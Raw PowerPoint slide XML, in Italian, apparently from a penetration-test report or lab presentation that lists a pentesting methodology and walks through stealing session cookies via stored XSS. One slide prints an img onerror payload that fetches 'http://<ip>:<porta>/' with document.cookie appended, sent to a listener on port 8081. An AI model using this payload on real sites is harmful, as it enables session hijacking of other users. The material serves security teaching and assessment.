              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A questo punto la nostra richiesta sarà prontamente intercettata la proxy, ora proviamo ad iniettare del XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>In particolare, apriamo una porta in ascolto su cui ci faremo inviare i cookie di sessione di un utente autorizzato a visualizzare le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>quotes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A questo punto sarà necessario conoscere il nostro IP per far inviare i cookie al nostro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> e alla nostra porta in ascolto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, schermo, software&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86506E30-C83C-1B42-66E1-F1D7716627A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106333" y="1131855"/>
            <a:ext cx="6401443" cy="4609038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="346828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3BDD8-36FC-48B0-8862-3B51BE4F7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7188C579-6F01-4060-BF31-C045C99A6C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0CBA8DA8-7039-4026-8733-D3F4908603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B834BE-C330-4AFA-9B27-8969E16F05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41B717-A199-4EEE-8434-CBC9E5DDEA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222AF-AB0D-4F6E-896E-C17796EB66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C2DAFE-2FB9-4D8D-BD2D-ED9F5F84F2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3CD814-26D5-4D79-87E0-19D14406A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7D5AAA-C842-4E1C-BC3A-1075F625FE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A2BF58-94DC-466E-8A14-22A3DB4795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34C7E0-0590-48E8-96F6-F360D134B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0978ED-0E33-431F-AB9B-9982B4ABCD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69CC66-E364-4939-9117-F8C4F07AC5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26B350-296D-48C7-BC91-284315CE9A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EF6201-58A9-4F7B-84D5-9B02266EC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7A0E2A-071B-4227-ACA6-A749AB0DC6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607F85-6A97-46C7-B9BC-B8505E1D6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E1BD4B-04FC-4BDC-A11E-35BD219580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F4F244-77B9-4EB1-AD29-2582BBCFF3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6CFC8A-72E2-4020-90D4-EE0E7DB39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F84F9E-4134-4152-959A-C2871B8013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FEA8FE-6283-4B9B-BEDC-A1E7B16612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E4F08-4425-45C0-A346-73394B795B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CBF93D-BA10-477C-B721-ABCBD81D0E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F94D0A0-D5E2-47F4-B493-370EA21A26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E9B354-9221-4A81-BFAE-3F702FB53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066CD6-AB8B-4DAA-9790-FE285D793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D472A8-84A4-4E1A-83B4-DE91C32E6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8D1A4B-4E3D-422F-984A-9891E2DDFD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46BA3F-F373-412C-869A-D8736E034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07C00C-AFB6-4E7D-87B9-44268CE733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7C4703-6318-4A09-87E7-1D19FB1ADA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DFFC6F-F715-482D-BC44-6DE29BEDF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42DA35F9-950C-4AD3-AAD4-731D45E4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2" y="206818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E91FA91F-6769-9A84-2F2D-C7B9F59A5376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691079" y="725951"/>
            <a:ext cx="10325000" cy="1926288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Metodologia utilizzata</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D21EA6A-D57E-FB4D-71B4-C3E73640E03E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146638" y="2884021"/>
            <a:ext cx="2986652" cy="3256282"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="822960">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1500" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="411480" indent="-411480" defTabSz="822960">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Gathering</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1500" kern="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="411480" indent="-411480" defTabSz="822960">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Scoping</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1500" kern="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="411480" indent="-411480" defTabSz="822960">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Gathering</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1500" kern="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="411480" indent="-411480" defTabSz="822960">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Target Discovery</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1500" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="411480" indent="-411480" defTabSz="822960">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" indent="-411480" defTabSz="822960">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" indent="-411480" defTabSz="822960">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Target Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" indent="-411480" defTabSz="822960">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" indent="-411480" defTabSz="822960">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Maintaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="411480" indent="-411480" defTabSz="822960">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Documentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1500" kern="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> and Reporting</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CasellaDiTesto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B8ADEB7-4958-A69E-C610-E9E7AA8FBF2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2572935" y="2883015"/>
            <a:ext cx="2476082" cy="674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22960">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1260" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="412D24"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>È stata usata la metodologia generica per il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1260" kern="1200" err="1">
                <a:solidFill>
                  <a:srgbClr val="412D24"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1260" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="412D24"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> che si compone delle seguenti fasi:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3245925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45" name="Freeform: Shape 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A7170E1-C163-4577-A0CE-588797377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2903"/>
            <a:ext cx="5917717" cy="1615977"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200"/>
              <a:t>Vulnerability mapping – analisi manuale</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2" descr="Immagine che contiene testo, schermata, software&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74AEFA31-4662-77FB-BDFC-A48B97BA2B9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2354474" y="2847874"/>
            <a:ext cx="6971389" cy="3293981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="534055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pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="4100" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4100"/>
              <a:t> mapping – analisi manuale</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Il seguente codice sarà usato per effettuare il test:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fetc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(“http://&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;:&lt;porta&gt;/”+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>);&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Naturalmente ora questo campo non va bene in quanto dovremmo prima effettuare l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> di tale stringa.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, software, schermo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F1BE6CF-B8C9-B694-E806-876E2ABFD570}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106333" y="1139856"/>
            <a:ext cx="6401443" cy="4593035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17062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Freeform: Shape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1517B3A5-1BB5-4C60-B65A-E4D6CA020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968990"/>
            <a:ext cx="10611627" cy="1651379"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> mapping – analisi manuale</a:t>
            </a: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577738" y="2893475"/>
            <a:ext cx="4914058" cy="3242577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ora che l’input è correttamente formattato possiamo procedere a metterci in ascolto sulla porta che abbiamo scelto (in questo caso 8081) ed aspettare i cookie di sessione.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{981E9ED8-88DE-3444-9EDC-83A4A01F46E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="691078" y="3254763"/>
            <a:ext cx="5412274" cy="2511100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
